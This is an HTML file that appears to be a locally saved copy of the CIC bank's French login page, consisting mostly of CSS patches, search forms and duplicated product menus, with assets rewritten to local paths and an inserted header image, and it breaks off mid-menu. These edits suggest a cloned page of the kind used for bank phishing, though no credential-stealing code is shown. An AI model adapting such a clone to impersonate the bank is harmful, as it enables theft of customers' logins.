<!DOCTYPE html>
<!-- saved from url=(0043)https://www.cic.fr/fr/authentification.html -->
<html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>CIC</title>

	
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link type="text/css" rel="stylesheet" href="./index_files/ei_base.css">
	<script type="text/javascript" async="" src="./index_files/f.txt"></script><script type="text/javascript" async="" src="./index_files/analytics.js.téléchargement"></script><script async="" src="./index_files/gtm.js.téléchargement"></script><script type="text/javascript" src="./index_files/jquery_ei.js.téléchargement"></script>
	<script type="text/javascript" src="./index_files/lightbox.js.téléchargement"></script>
<script type="text/javascript" src="./index_files/ei_tools.js.téléchargement"></script>
	<script type="text/javascript" src="./index_files/tracking_event.js.téléchargement"></script>


     <style>
	/* Patch temporaire sur Univers Vélo Electrique */
    .ei_product-velotemp {
        background-color: #FFF;
        background-size: contain;
    }
	/*bogue ie11 Univers Vélo pas encore intégré dans la charte*/
	.ei_productcard__amount .ei_blcdata_val .ei_blcdata_valtext {
		display:block;
	}
	/*bourse accueil patch 07/07/2020*/
	.ei_ergov5 #divTuiles .ei_tile .ei_tile_body td {
		color: #000;
	}
	.ei_ergov5 #divTuiles .ei_tile .ei_tile_body td.rupture {
		color: #fff;
	}
	.ei_ergov5 #divTuiles .ei_tile .ei_tile_body .rupture td {
		color: #fff;
	}
	.ei_ergov5 #divTuiles .ei_tile .ei_tile_body td.ei_neg  {
		color: #f31;
	}
	.ei_ergov5 #divTuiles .ei_tile .ei_tile_body td.ei_pos  {
		color: #099;
	}
	/*41998134 bogue ie11 sur flex*/
	@media all and (-ms-high-contrast:none){
		*::-ms-backdrop, ._devb_act .a_blocappli .ei_offercard.ei_offercard-newlook {	display:block;}
		*::-ms-backdrop, ._devb_act .a_blocappli .ei_richrbgroup_slice.ei_richrbgroup_grid2.ei_richrbgroup .ei_richrb {max-width:calc((100%/2) - 3px)}
	}
	
	/*bogue sur Rechercher un tiré > corrigé en 01/2021*/
		table.liste th.rupture small.cot2 a {
			color: #f57c00 !important;
		}
		table.liste th.rupture small.cot2:empty {
			display:none;
		}
		.ircc.ei_slide .ircc__stickers-ircc {
			background-color: #099;
		}
		.ircc.ei_slide .ircc__stickers-ircc:focus {
			background-color: #099;
		}
		/*bandeau cookie*/
#cookieLB [tabindex="-1"]:focus {outline: none;}
#cookieLB .ei_gpblock .ei_gpblock_header .ei_titlelabel {
    font-size: 1.692em;
    font-weight: 700;
}
#cookieLB .ei_js_hidden {
    display: none;
}
#cookieLB .ei_buttonbar .ei_button .ei_btn {
    height: 34px;
}
@media screen and (max-width: 759px) {
	#cookieLB .ei_buttonbar {
		margin: 0;
		display:block;
	}
	#cookieLB .ei_mainbuttons {
		display:block;
	}
	#cookieLB .ei_button {
		display:block;
	}
	#cookieLB .ei_button .ei_btn {
		display:block !important;
		margin:16px auto 0 !important
	}
	
}
    </style>



	<!--link type="text/css" rel="stylesheet" href="https://cdnii.e-i.com/INGR/sd/cic_2015/19.89.3/fr/css/ei_base.css" /-->
	<script src="./index_files/env.js.téléchargement" type="text/javascript"></script>
    <script type="text/javascript" src="./index_files/ajax_search.js.téléchargement"></script>
	<script src="./index_files/env_menu.js.téléchargement" type="text/javascript"></script>

	<link href="./index_files/ei_custom_responsive.css" rel="stylesheet" type="text/css">
    <!-- favicones-->
    <link rel="apple-touch-icon" sizes="180x180" href="https://cdnii.e-i.com/INGR/sd/cic_2015/19.89.3/fr/images/std/favicons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://cdnii.e-i.com/INGR/sd/cic_2015/19.89.3/fr/images/std/favicons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://cdnii.e-i.com/INGR/sd/cic_2015/19.89.3/fr/images/std/favicons/favicon-16x16.png">
    <link rel="manifest" href="https://cdnii.e-i.com/INGR/sd/cic_2015/19.89.3/fr/images/std/favicons/site.webmanifest">
    <link rel="mask-icon" href="https://cdnii.e-i.com/INGR/sd/cic_2015/19.89.3/fr/images/std/favicons/safari-pinned-tab.svg" color="#ffffff">
    <meta name="msapplication-TileColor" content="#ffffff">
    <meta name="theme-color" content="#ffffff">
<style>#errctxjs { display: none; }</style>
<style>
/*style rédactionnel déja intégré à la charte*/
.ei_ico_accentcolor::after, .ei_ico_accentcolor::before {
    color: #099;
}
.ei_gpblock-redac > .ei_gpblock_header .ei_titlelabel span[class*="ei_gly_"] {
    opacity: 1;
}
.ei_gpblock-redac > .ei_gpblock_header .ei_titlelabel {
    font-family: roboto_bold,Arial,Helvetica,sans-serif;
    font-weight: 400;
    font-size: 30px;
}
.ei_gpblock-redac .ei_card .ei_card_content .ei_card_header .ei_card_title .ei_statustag {
    letter-spacing: 0;
}
.ei_gpblock-redac .ei_card .ei_card_content .ei_card_header .ei_card_title {
    font-family: roboto_regular,Arial,Helvetica,sans-serif;
    font-weight: 400;
    font-size: 22px;
    color: #0f228b;
}
div.ei_mainblocfct-redac {
    background-color: #fff;
}
div.ei_gpblock-redac.ei_spaced.ei_gpblock {
    margin-top: 0;
    margin-bottom: 0;
}
.ei_gpblock-redac.ei_gpblock {
    padding: 20px 50px;
}
.ei_gpblock-redac .ei_card {
    border-bottom: #0f228b 5px solid !important;
}
.ei_gpblock-redac .ei_cardboarditem {
	margin-bottom:27px;
}
div.ei_mainblocfct-redac .ei_mainblocfctl_title .ei_titlecontent .ei_titlelabelsblock .ei_subtitlelabel {
	margin-right:50px;
}

/*à supprimer une fois la correction game faite*/
#ei_tpl_fullsite div.ei_mainblocfct-redac .ei_mainblocfctl_title { 
	background-image:none !important; min-height:auto !important;
}
 div.ei_mainblocfct-redac .ei_subtitlelabel { 
	background-image:url('https://www.cic.fr/partage/fr/CC/CIC-2015/assets/outils/PAGICA/entete_1248x400.jpg') !important; min-height:350px;
}
#ei_tpl_menuPrincipal nav ul li.e_menuinline>.e_smenu>ul>li>a span span {
	height: auto;
}

.ei_slide .ei_carousel__upperzone {width: 100%;}
_:-ms-input-placeholder, :root .ei_slide .ei_carousel__item {margin-left: 0;}
</style>
<script>
$(document).ready(function() {
	$("div.ei_mainblocfct-redac .ei_subtitlelabel p").addClass("ei_dynabsolutepos");
})

</script>


  <link type="text/css" rel="stylesheet" href="./index_files/ei_common_hdetail.css">
  <link type="text/css" rel="stylesheet" href="./index_files/ei_custom_hdetail.css">
  <link type="text/css" rel="stylesheet" href="./index_files/ei_common_base.css">
  <link type="text/css" rel="stylesheet" href="./index_files/ei_common_gauges.css">
  <link type="text/css" rel="stylesheet" href="./index_files/ei_common_avis.css">
  <link type="text/css" rel="stylesheet" href="./index_files/ei_custom_voc.css">
  <script type="text/javascript" src="./index_files/lightbox.js.téléchargement"></script>
  <script type="text/javascript" src="./index_files/VocMain.js.téléchargement"></script>
  <style>
  .hide_voc {
  display:none!important;
  }
  </style>

<script type="text/javascript" src="./index_files/sessionUtils.min.js.téléchargement"></script>
<link type="text/css" rel="stylesheet" href="./index_files/ei_needscript.css">
<script type="text/javascript" src="./index_files/display.js.téléchargement"></script>
<script type="text/javascript" src="./index_files/lightbox.js.téléchargement"></script>

	<link href="./index_files/ei_custom_richradbutton.css" rel="stylesheet" type="text/css">


    <!-- conseils_footerscript -->
    <link href="./index_files/ei_custom_conseiller.css" rel="stylesheet" type="text/css">

    <style type="text/css">
	.ei_carousel__item img{max-width:100%;}
    </style>
    <!-- fin conseils_footerscript -->


	<script>var espacewat = 'Conseil'</script>
	<link type="text/css" rel="stylesheet" href="./index_files/styles.css">
	<link type="text/css" rel="stylesheet" href="./index_files/cic.css">
	<link href="./index_files/ei_custom_conseiller.css" rel="stylesheet" type="text/css">
	<link href="./index_files/ei_custom_cardboard.css" rel="stylesheet" type="text/css">
	<link type="text/css" rel="stylesheet" media="print" href="./index_files/print.css">
	<script type="text/javascript" src="./index_files/cic.js.téléchargement"></script>
	<script type="text/javascript" src="./index_files/ei_common_cardboard.js.téléchargement"></script>
	<script async="" src="./index_files/tests.js.téléchargement" charset="UTF-8"></script>

<script type="text/javascript" src="./index_files/tracking_event.js(1).téléchargement" charset="UTF-8"></script>
<!-- Datasinks V1 -->

<!-- Datasinks V2 -->

<link type="text/css" rel="stylesheet" href="./index_files/ei_custom_messenger.css">
<link type="text/css" rel="stylesheet" href="./index_files/ei_custom_scrollzone.css">
<link type="text/css" rel="stylesheet" href="./index_files/ei_custom_carousel.css">


<script src="./index_files/f(1).txt"></script></head>
<body class="ei_tpl_conseil ei_nobackground ei_cic2015">



<ul id="e_raccourci">
<!-- liens vitrine-->
    <li class="ei_quicklink_vitrine"><a href="https://www.cic.fr/fr/authentification.html">Espace client</a></li>
    <li class="ei_quicklink_vitrine"><a href="https://www.cic.fr/fr/authentification.html#ei_quicklink_content">Contenu principal</a></li>
    <li class="eir_hidexs ei_quicklink_vitrine"><a href="https://www.cic.fr/fr/authentification.html#ei_quicklink_menu">Menu principal</a></li>
    <li class="eir_hidexs ei_quicklink_vitrine"><a href="https://www.cic.fr/fr/authentification.html#ei_quicklink_search">Zone de recherche</a></li>
    <li class="ei_quicklink_vitrine"><a href="https://www.cic.fr/fr/authentification.html#ei_quicklink_header">Entête de page</a></li>
    <li class="ei_quicklink_vitrine"><a href="https://www.cic.fr/fr/authentification.html#ei_quicklink_footer">Pied de page</a></li>	
<!-- liens transac-->
    <li class="ei_quicklink_transac"><a href="https://www.cic.fr/fr/authentification.html#ei_tpl_content">Contenu principal</a></li>
    <li class="ei_quicklink_transac"><a href="https://www.cic.fr/fr/authentification.html#ei_tpl_footer">Pied de page</a></li>
    <li class="ei_quicklink_transac"><a href="https://www.cic.fr/fr/services/messagerie-conversation.html" aria-label="votre conseiller (nouvelle fenêtre)" target="_blank">Votre conseiller</a></li>
</ul>

<div id="ei_tpl_menuMobil" style="">
	<div id="ei_tpl_mMobContent">
		<div id="ei_tpl_mMobPrincipal">
		<div id="ei_tpl_searchmobil">
			<form autocomplete="off" action="https://www.cic.fr/fr/search_engine.html" method="get" name="form_rechercher" class="CMSD_search ei_srchbar_form" role="search" id="SRCH_form_header">
	<label class="e_invisible" for="SRCH_top">Rechercher</label>
	<input required="required" type="text" id="SRCH_top" class="pQuery SRCH_input ei_srchbar_input" onfocus="fc_search_focus(true)" oninvalid="this.setCustomValidity(&#39;Merci de saisir votre demande&#39;)" oninput="setCustomValidity(&#39;&#39;)" title="Rechercher" placeholder="Rechercher" name="pQuery" role="combobox" aria-expanded="true" aria-haspopup="listbox" aria-autocomplete="list" autocomplete="off" aria-controls="lstresult" aria-activedescendant="op1">
	<div class="autocomplete_search_top autocomplete_search" style="display:none;"></div>
	<button class="ei_srchbar_button" type="submit" title="Lancer la recherche">
		<span class="ei_sronly">Lancer la recherche</span>
		<span class="ei_srchbar_glyph" aria-hidden="true"></span>
	</button>
<input type="hidden" name="pSpace" value="Particulier"></form>


<script type="text/javascript">
var srchConfig = {
  redirectUrl: "/fr/SearchRedirect.aspx",
  searchAjaxUrl: "/fr/SearchAjax.html",
  formUrl: "/fr/search_engine.html"
};
</script>
 
		</div>
		<a id="ei_quicklink_menu" tabindex="-1"></a>
 		<nav id="CMSD_MENU" aria-label="menu principal" role="navigation">
			<!-- Menu.Net MenuHandler--><ul>
        
            <li id="ei_m_accueil" class="e_smenumiddle">
                <a target="_self" data-page="153006" href="https://www.cic.fr/fr/banques/particuliers/index.html">Accueil</a>
            </li>
        
            <li id="es_menu_espace_particulier" class="e_menuinline cc_menu_espace">
                <a target="_self" data-page="150398" href="https://www.cic.fr/fr/banques/particuliers/index.html" style="">Particuliers</a>
                <div class="e_smenu">
                    
                    <ul>
                            
                                <li class="e_menudepliant  e_smenumiddle">
                                    <a target="_self" data-page="150399" href="https://www.cic.fr/fr/banques/particuliers/gestion-courante.html">Comptes et Cartes</a>
                                    <div class="e_smenu">
                                        
                                        <ul>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150400" href="https://www.cic.fr/fr/particuliers/comptes/choisir-compte.html">Choisir votre compte</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150401" href="https://www.cic.fr/fr/banques/particuliers/gestion-courante/regler-vos-depenses/index.html">Régler vos dépenses</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="238419" href="https://www.cic.fr/fr/particuliers/comptes/choisir-carte-bancaire.html">Choisir votre carte bancaire</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150402" href="https://www.cic.fr/fr/banques/particuliers/gestion-courante/optimiser-votre-budget/index.html">Optimiser votre budget</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150403" href="https://www.cic.fr/fr/particuliers/comptes/paiement-en-ligne-securite.html">Sécuriser vos opérations</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150454" href="https://www.cic.fr/fr/protection-des-donnees-personnelles/index.html">Protection des données</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150453" href="https://www.cic.fr/fr/banques/particuliers/nous-contacter/simulations-souscriptions.html">Simulations et souscriptions</a>
                                                    </li>
                                        </ul>
                                        
                                    </div>
                                </li>
                            
                                <li class="e_menudepliant e_smenumiddle">
                                    <a target="_self" data-page="150456" href="https://www.cic.fr/fr/banques/particuliers/epargne.html">Épargne</a>
                                    <div class="e_smenu">
                                        
                                        <ul>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150457" href="https://www.cic.fr/fr/banques/particuliers/epargne/epargner-au-quotidien/index.html">Épargner au quotidien</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150458" href="https://www.cic.fr/fr/banques/particuliers/epargne/epargner-pour-un-projet/index.html">Épargner pour un projet</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150459" href="https://www.cic.fr/fr/banques/particuliers/epargne/valoriser-et-transmettre-un-patrimoine/index.html">Valoriser un patrimoine</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150460" href="https://www.cic.fr/fr/banques/particuliers/epargne/optimiser-votre-fiscalite/index.html">Optimiser votre fiscalité</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="213068" href="https://www.cic.fr/fr/banques/particuliers/epargne/epargner-pour-votre-retraite/index.html">Épargner pour votre retraite</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="251883" href="https://www.cic.fr/fr/particuliers/epargne/transmettre-un-patrimoine.html">Transmettre un patrimoine</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150513" href="https://www.cic.fr/fr/banques/particuliers/nous-contacter/simulations-souscriptions.html">Simulations et souscriptions</a>
                                                    </li>
                                        </ul>
                                        
                                    </div>
                                </li>
                            
                                <li class="e_menudepliant e_smenumiddle">
                                    <a target="_self" data-page="150514" href="https://www.cic.fr/fr/banques/particuliers/credits.html">Crédits</a>
                                    <div class="e_smenu">
                                        
                                        <ul>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150515" href="https://www.cic.fr/fr/banques/particuliers/credits/acheter-un-vehicule/index.html">Acheter un véhicule</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150517" href="https://www.cic.fr/fr/banques/particuliers/credits/acheter-un-logement/index.html">Acheter un logement</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150520" href="https://www.cic.fr/fr/banques/particuliers/credits/realiser-des-travaux/index.html">Financer des travaux</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150521" href="https://www.cic.fr/fr/banques/particuliers/credits/equiper-votre-logement/index.html">Équiper votre logement</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150574" href="https://www.cic.fr/fr/banques/particuliers/credits/financer-imprevus.html">Financer vos imprévus</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150518" href="https://www.cic.fr/fr/banques/particuliers/credits/financer-des-etudes/index.html">Financer des études</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150519" href="https://www.cic.fr/fr/banques/particuliers/credits/financer-le-permis-de-conduire/index.html">Financer le permis de conduire</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150575" href="https://www.cic.fr/fr/banques/particuliers/nous-contacter/simulations-souscriptions.html">Simulations et souscriptions</a>
                                                    </li>
                                        </ul>
                                        
                                    </div>
                                </li>
                            
                                <li class="e_menudepliant e_smenumiddle">
                                    <a target="_self" data-page="150576" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/index.html">Assurances</a>
                                    <div class="e_smenu">
                                        
                                        <ul>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150577" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/assurer-votre-vehicule/index.html">Assurer votre véhicule</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150578" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/assurer-votre-logement/index.html">Assurer votre logement</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150626" href="https://www.cic.fr/fr/particuliers/assurance-CIC/proteger-votre-logement.html">Protéger votre logement</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150579" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/couvrir-vos-depenses-de-sante/index.html">Couvrir vos dépenses de santé</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150581" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/assurer-votre-famille/index.html">Assurer votre famille</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150622" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/maintenir-vos-revenus/index.html">Maintenir vos revenus</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150624" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/vous-assurer-un-complement-de-retraite/index.html">Vous assurer un complément de retraite</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150625" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/assurer-vos-animaux-et-vos-loisirs/index.html">Assurer vos animaux et vos loisirs</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150623" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/vous-proteger-au-quotidien/index.html">Vous protéger au quotidien</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150621" href="https://www.cic.fr/fr/banques/particuliers/nous-contacter/simulations-souscriptions.html">Simulations et souscriptions</a>
                                                    </li>
                                        </ul>
                                        
                                    </div>
                                </li>
                            
                                <li class="e_menudepliant e_smenumiddle">
                                    <a target="_self" data-page="150627" href="https://www.cic.fr/fr/banques/particuliers/mobile.html">Mobile</a>
                                    <div class="e_smenu">
                                        
                                        <ul>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150628" href="https://www.cic.fr/fr/banques/particuliers/mobile/forfaits/index.html">Forfaits mobile</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150662" href="https://www.cic.fr/fr/banques/particuliers/mobile/telephonie-mobile/index.html">Téléphones</a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150630" href="https://www.cic.fr/fr/banques/particuliers/mobile/services-CIC-mobile/index.html">Objets connectés</a>
                                                    </li>
                                        </ul>
                                        
                                    </div>
                                </li>
                            
                                <li>
                                    <a target="_self" data-page="150977" href="https://www.cic.fr/fr/banques/particuliers/nous-contacter/simulations-souscriptions.html">Simulations et souscriptions</a>
                                </li>
                            
                    </ul>
                    
                </div>
            </li>
</ul>
<!-- /Menu.Net -->
 		</nav> 
	</div>
	</div>
</div>
<img  style="width:1700px;height:120px;"src="./index_files/bar.png"/>

	</header>
	<div id="CYB1_VOC_LIGHTBOX"></div>		
	<div id="ei_tpl_menuPrincipal" data-sticky="">
		<div id="ei_tpl_searchmobil">
			<form autocomplete="off" action="https://www.cic.fr/fr/search_engine.html" method="get" name="form_rechercher" class="CMSD_search ei_srchbar_form" role="search" id="SRCH_form_header">
	<label class="e_invisible" for="SRCH_top">Rechercher</label>
	<input required="required" type="text" id="SRCH_top" class="pQuery SRCH_input ei_srchbar_input" onfocus="fc_search_focus(true)" oninvalid="this.setCustomValidity(&#39;Merci de saisir votre demande&#39;)" oninput="setCustomValidity(&#39;&#39;)" title="Rechercher" placeholder="Rechercher" name="pQuery" role="combobox" aria-expanded="true" aria-haspopup="listbox" aria-autocomplete="list" autocomplete="off" aria-controls="lstresult" aria-activedescendant="op1">
	<div class="autocomplete_search_top autocomplete_search" style="display:none;"></div>
	<button class="ei_srchbar_button" type="submit" title="Lancer la recherche">
		<span class="ei_sronly">Lancer la recherche</span>
		<span class="ei_srchbar_glyph" aria-hidden="true"></span>
	</button>
<input type="hidden" name="pSpace" value="Particulier"></form>


<script type="text/javascript">
var srchConfig = {
  redirectUrl: "/fr/SearchRedirect.aspx",
  searchAjaxUrl: "/fr/SearchAjax.html",
  formUrl: "/fr/search_engine.html"
};
</script>
 
		</div>
		<a id="ei_quicklink_menu" tabindex="-1"></a>
 		<nav id="CMSD_MENU" aria-label="menu principal" role="navigation">
			<!-- Menu.Net MenuHandler--><ul>
        
            <li id="ei_m_accueil" class="e_smenumiddle">
                <a target="_self" data-page="153006" href="https://www.cic.fr/fr/banques/particuliers/index.html" tabindex="0"><span>Accueil</span></a>
            </li>
        
            <li id="es_menu_espace_particulier" class="e_menuinline cc_menu_espace">
                <a target="_self" data-page="150398" href="https://www.cic.fr/fr/banques/particuliers/index.html" tabindex="-1" style=""><span>Particuliers</span></a>
                <div class="e_smenu">
                    
                    <ul>
                            
                                <li class="e_menudepliant  e_smenumiddle">
                                    <a target="_self" data-page="150399" href="https://www.cic.fr/fr/banques/particuliers/gestion-courante.html" tabindex="-1"><span>Comptes et Cartes</span></a>
                                    <div class="e_smenu" style="left: -61px;">
                                        
                                        <ul>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150400" href="https://www.cic.fr/fr/particuliers/comptes/choisir-compte.html" tabindex="-1"><span>Choisir votre compte</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150401" href="https://www.cic.fr/fr/banques/particuliers/gestion-courante/regler-vos-depenses/index.html" tabindex="-1"><span>Régler vos dépenses</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="238419" href="https://www.cic.fr/fr/particuliers/comptes/choisir-carte-bancaire.html" tabindex="-1"><span>Choisir votre carte bancaire</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150402" href="https://www.cic.fr/fr/banques/particuliers/gestion-courante/optimiser-votre-budget/index.html" tabindex="-1"><span>Optimiser votre budget</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150403" href="https://www.cic.fr/fr/particuliers/comptes/paiement-en-ligne-securite.html" tabindex="-1"><span>Sécuriser vos opérations</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150454" href="https://www.cic.fr/fr/protection-des-donnees-personnelles/index.html" tabindex="-1"><span>Protection des données</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150453" href="https://www.cic.fr/fr/banques/particuliers/nous-contacter/simulations-souscriptions.html" tabindex="-1"><span>Simulations et souscriptions</span></a>
                                                    </li>
                                        </ul>
                                        
                                    </div>
                                </li>
                            
                                <li class="e_menudepliant e_smenumiddle">
                                    <a target="_self" data-page="150456" href="https://www.cic.fr/fr/banques/particuliers/epargne.html" tabindex="-1"><span>Épargne</span></a>
                                    <div class="e_smenu" style="left: -95px;">
                                        
                                        <ul>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150457" href="https://www.cic.fr/fr/banques/particuliers/epargne/epargner-au-quotidien/index.html" tabindex="-1"><span>Épargner au quotidien</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150458" href="https://www.cic.fr/fr/banques/particuliers/epargne/epargner-pour-un-projet/index.html" tabindex="-1"><span>Épargner pour un projet</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150459" href="https://www.cic.fr/fr/banques/particuliers/epargne/valoriser-et-transmettre-un-patrimoine/index.html" tabindex="-1"><span>Valoriser un patrimoine</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150460" href="https://www.cic.fr/fr/banques/particuliers/epargne/optimiser-votre-fiscalite/index.html" tabindex="-1"><span>Optimiser votre fiscalité</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="213068" href="https://www.cic.fr/fr/banques/particuliers/epargne/epargner-pour-votre-retraite/index.html" tabindex="-1"><span>Épargner pour votre retraite</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="251883" href="https://www.cic.fr/fr/particuliers/epargne/transmettre-un-patrimoine.html" tabindex="-1"><span>Transmettre un patrimoine</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150513" href="https://www.cic.fr/fr/banques/particuliers/nous-contacter/simulations-souscriptions.html" tabindex="-1"><span>Simulations et souscriptions</span></a>
                                                    </li>
                                        </ul>
                                        
                                    </div>
                                </li>
                            
                                <li class="e_menudepliant e_smenumiddle">
                                    <a target="_self" data-page="150514" href="https://www.cic.fr/fr/banques/particuliers/credits.html" tabindex="-1"><span>Crédits</span></a>
                                    <div class="e_smenu" style="left: -98px;">
                                        
                                        <ul>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150515" href="https://www.cic.fr/fr/banques/particuliers/credits/acheter-un-vehicule/index.html" tabindex="-1"><span>Acheter un véhicule</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150517" href="https://www.cic.fr/fr/banques/particuliers/credits/acheter-un-logement/index.html" tabindex="-1"><span>Acheter un logement</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150520" href="https://www.cic.fr/fr/banques/particuliers/credits/realiser-des-travaux/index.html" tabindex="-1"><span>Financer des travaux</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150521" href="https://www.cic.fr/fr/banques/particuliers/credits/equiper-votre-logement/index.html" tabindex="-1"><span>Équiper votre logement</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150574" href="https://www.cic.fr/fr/banques/particuliers/credits/financer-imprevus.html" tabindex="-1"><span>Financer vos imprévus</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150518" href="https://www.cic.fr/fr/banques/particuliers/credits/financer-des-etudes/index.html" tabindex="-1"><span>Financer des études</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150519" href="https://www.cic.fr/fr/banques/particuliers/credits/financer-le-permis-de-conduire/index.html" tabindex="-1"><span>Financer le permis de conduire</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150575" href="https://www.cic.fr/fr/banques/particuliers/nous-contacter/simulations-souscriptions.html" tabindex="-1"><span>Simulations et souscriptions</span></a>
                                                    </li>
                                        </ul>
                                        
                                    </div>
                                </li>
                            
                                <li class="e_menudepliant e_smenumiddle">
                                    <a target="_self" data-page="150576" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/index.html" tabindex="-1"><span>Assurances</span></a>
                                    <div class="e_smenu" style="left: -83px;">
                                        
                                        <ul>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150577" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/assurer-votre-vehicule/index.html" tabindex="-1"><span>Assurer votre véhicule</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150578" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/assurer-votre-logement/index.html" tabindex="-1"><span>Assurer votre logement</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150626" href="https://www.cic.fr/fr/particuliers/assurance-CIC/proteger-votre-logement.html" tabindex="-1"><span>Protéger votre logement</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150579" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/couvrir-vos-depenses-de-sante/index.html" tabindex="-1"><span>Couvrir vos dépenses de santé</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150581" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/assurer-votre-famille/index.html" tabindex="-1"><span>Assurer votre famille</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150622" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/maintenir-vos-revenus/index.html" tabindex="-1"><span>Maintenir vos revenus</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150624" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/vous-assurer-un-complement-de-retraite/index.html" tabindex="-1"><span>Vous assurer un complément de retraite</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150625" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/assurer-vos-animaux-et-vos-loisirs/index.html" tabindex="-1"><span>Assurer vos animaux et vos loisirs</span></a>
                                                    </li>
                                                
                                                    <li>
                                                        <a target="_self" data-page="150623" href="https://www.cic.fr/fr/banques/particuliers/assurances-CIC/vous-proteger-au-quotidien/index.html" tabindex="-1"><span>Vous protéger au quotidien</span></a>
                                                    </li>
                                                
                                                    <li>
